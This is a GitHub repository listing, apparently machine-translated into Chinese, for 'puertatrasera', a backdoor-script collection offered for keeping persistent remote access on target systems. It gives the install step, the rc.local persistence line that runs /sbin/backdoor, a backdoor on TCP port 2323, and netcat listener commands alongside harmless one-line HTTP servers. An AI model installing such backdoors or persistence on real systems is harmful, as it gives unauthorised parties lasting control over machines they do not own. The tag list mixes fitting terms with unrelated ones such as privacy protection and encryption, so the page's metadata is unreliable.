hackingyseguridad/puertatrasera

GitHub: hackingyseguridad/puertatrasera

使用 netcat、Python、Ruby、PHP 等多语言实现的轻量级后门脚本集合,用于在目标系统上快速建立持久化的远程访问通道。

Stars: 1 | Forks: 1

http://hackingyseguridad.com/ ### puertatrasera 使用不同语言编写的简单脚本,用于创建后门 (backdoor) 或隐蔽通道 ### instalar.sh ( 执行 `sh instalar.sh` 即可在我们希望保留后门驻留的系统中进行安装 )。 如果未能生效,我们可以编辑 rc.local 文件并加入该脚本的执行命令: vi /etc/rc.local /sbin/backdoor 其他命令: ### netcat while true ; do nc -l 8000 < index.html ; done 或 rlwrap nc -lvnp 8080 ### backdoor ( 在 Linux 中作为进程安装。TCP 端口 2323 ) ### telnetcliente IP ( 用于访问的 telnet 客户端 ) ### busybox httpd busybox httpd -f -p 8000 ### Python 2.x python -m SimpleHTTPServer 8000 ### Python 3.x python -m http.server 8000 ### Ruby ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd).start' ### Ruby 1.9.2+ ruby -run -ehttpd . -p8000 ### Php php -S 127.0.0.1:8000
标签:Busybox httpd, Cutter, Google搜索, Linux持久化, netcat, PHP内置服务器, Python HTTP Server, rc.local, Ruby WEBrick, Telnet客户端, 反弹Shell, 后门, 命令行控制, 安全测试, 客户端加密, 恶意脚本, 攻击性安全, 攻击路径可视化, 系统入侵, 系统后门, 网络安全, 远程访问, 逆向工具, 隐私保护, 黑客工具